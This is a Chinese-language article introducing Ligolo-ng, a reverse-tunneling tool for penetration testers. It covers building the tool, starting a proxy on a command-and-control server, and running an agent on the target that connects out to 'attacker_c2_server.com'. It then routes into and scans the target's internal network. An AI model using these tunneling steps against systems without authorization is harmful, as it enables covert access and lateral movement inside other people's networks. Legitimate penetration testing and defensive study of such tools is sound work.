资讯专栏INFORMATION COLUMN

【网络安全】无需SOCKS支持,帮助广大渗透测试人员建立一条隐蔽的通信信道

zhisheng / 2232人阅读

摘要:是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向连接建立一条隐蔽的通信信道,而且无需支持。在使用时,你应该使用或以避免假阳性。

关于Ligolo-ng

Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的通信信道,而且无需SOCKS支持。

功能介绍

Tun接口(不再需要SOCKS);

简单的UI界面,支持选择代理和网络信息;

易于使用,易于安装;

基于Let’s Encrypt的自动化证书配置;

高性能(多路复用);

不需要高级权限;

套接字监听/代理绑定;

多平台代理支持;

工具构建

构建Ligolo-ng

$ go build -o agent cmd/agent/main.go$ go build -o proxy cmd/proxy/main.go# Build agent for Windows$ GOOS=windows go build -o agent.exe cmd/agent/main.go

安装Ligolo-ng
我们需要在自己的命令控制服务器上开启代理服务,默认使用11601端口监听:

$ sudo ip tuntap add user [your_username] mode tun ligolo$ sudo ip link set ligolo up$ ./proxy -h # Help options$ ./proxy -autocert # Automatically request LetsEncrypt certificates

工具使用

首先,我们需要在目标设备上启动代理(无需特殊权限):

$ ./agent -connect attacker_c2_server.com:11601

此时,代理服务器上将出现一条会话链接:

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

使用“session”命令选择代理:

ligolo-ng » session? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

使用“ifconfig”命令显示代理的网络配置信息:

[Agent : nchatelain@nworkstation] » ifconfig[...]┌─────────────────────────────────────────────┐│ Interface 3                                 │├──────────────┬──────────────────────────────┤│ Name         │ wlp3s0                       ││ Hardware MAC │ de:ad:be:ef:ca:fe            ││ MTU          │ 1500                         ││ Flags        │ up|broadcast|multicast       ││ IPv4 Address │ 192.168.0.30/24             │└──────────────┴──────────────────────────────┘

在代理/中继服务器上添加一条指向192.168.0.0/24代理网络的路由:

$ sudo ip route add 192.168.0.0/24 dev ligolo

最后,在代理上开启一条通信信道:

[Agent : nchatelain@nworkstation] » start[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation   

现在,你就可以通过代理服务器访问192.168.0.0/24代理网络:

$ nmap 192.168.0.0/24 -v -sV -n[...]$ rdesktop 192.168.0.123[...]

支持的协议/数据包

TCP

UDP

ICMP

性能

在Ligolo-ng的帮助下,你可以轻松达到100 Mbits/秒的速度。下面给出的测试结果是在一台200Mbits/s服务器上使用iperf测试的一条200Mbits/s的链接:

$ iperf3 -c 10.10.0.1 -p 24483Connecting to host 10.10.0.1, port 24483[  5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483[ ID] Interval           Transfer     Bitrate         Retr  Cwnd[  5]   0.00-1.00   sec  12.5 MBytes   105 Mbits/sec    0    164 KBytes       [  5]   1.00-2.00   sec  12.7 MBytes   107 Mbits/sec    0    263 KBytes       [  5]   2.00-3.00   sec  12.4 MBytes   104 Mbits/sec    0    263 KBytes       [  5]   3.00-4.00   sec  12.7 MBytes   106 Mbits/sec    0    263 KBytes       [  5]   4.00-5.00   sec  13.1 MBytes   110 Mbits/sec    2    134 KBytes       [  5]   5.00-6.00   sec  13.4 MBytes   113 Mbits/sec    0    147 KBytes       [  5]   6.00-7.00   sec  12.6 MBytes   105 Mbits/sec    0    158 KBytes       [  5]   7.00-8.00   sec  12.1 MBytes   101 Mbits/sec    0    173 KBytes       [  5]   8.00-9.00   sec  12.7 MBytes   106 Mbits/sec    0    182 KBytes       [  5]   9.00-10.00  sec  12.6 MBytes   106 Mbits/sec    0    188 KBytes       - - - - - - - - - - - - - - - - - - - - - - - - -[ ID] Interval           Transfer     Bitrate         Retr[  5]   0.00-10.00  sec   127 MBytes   106 Mbits/sec    2             sender[  5]   0.00-10.08  sec   125 MBytes   104 Mbits/sec                  receiver

注意事项

由于代理并不是以高级权限运行的,因此无法转发原始数据包。当你执行“NMAP SYN-SCAN”的时候,代理上会执行一次TCP connect()。

在使用Nmap时,你应该使用“–unprivileged”或“-PE”以避免假阳性。

工具使用演示

视频地址:【点我观看

网络安全学习攻略

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/121222.html

相关文章

  • 内网域渗透分析(实战总结)

    摘要:搭建代理添加一个代理建立了一条由攻击机到服务器的通道,的服务端在攻击机,也是反向代理复制代理链接到中让所有模块的流量都通过此代理走。全局设置允许反向代理,通过反弹,建立双向通道。 ...

    FuisonDesign 评论0 收藏0
  • 计算机网络安全(一)

    摘要:在计算机网络发展面临重大机遇的同时,网络安全形式也日益严峻,国家政治经济文化社会国防安全及公民在网络空间的合法权益面临着风险和挑战。最早的计算机网络也被称为计算机通信网。现阶段,一个完整的计算机网络结构体系由两部分组成。 ...

    isaced 评论0 收藏0
  • 云计算面临典型威胁

    摘要:宋体为了云计算的健康发展和等级保护工作在新形势下顺利推进,就不能忽视对云计算面临的各类安全威胁的研究和分析,并制定和建立相应的等级保护政策技术体系,应对即将到来的云浪潮。     为了云计算的健康发展和等级保护工作在新形势下顺利推进,就不能忽视对云计算面临的各类安全威胁的研究和分析,并制定和建立相应的等级保护政策、技术体系,应对即将到来的云浪潮。在云环境中,除了传统意义所面临的各类安全威胁外...

    rozbo 评论0 收藏0
  • 网络安全】基于网络攻击链安全防护思考

    摘要:庞大的数据说明了恶意代码的网络传播行为尤为猖獗,全网计算机用户的网络安全防护意识仍待提高。查看网络安全学习资料安装木马攻击者在获取到目标系统的控制权限后,将在目标系统中安装木马,植入后门,后门程序通常具有极强的隐蔽性,很难被正常用户发现。 ...

    jsummer 评论0 收藏0
  • NISP一级备考知识总结之信息安全概述、信息安全基础

    摘要:第三阶段互联网的使用世纪年代末,美国出现了第一一个用于军事目的的计算机网络。全球范围内陡然上升的网络攻击威胁导致各国对 参加每年的大学生网络安全精英赛通过初赛就可以...

    diabloneo 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<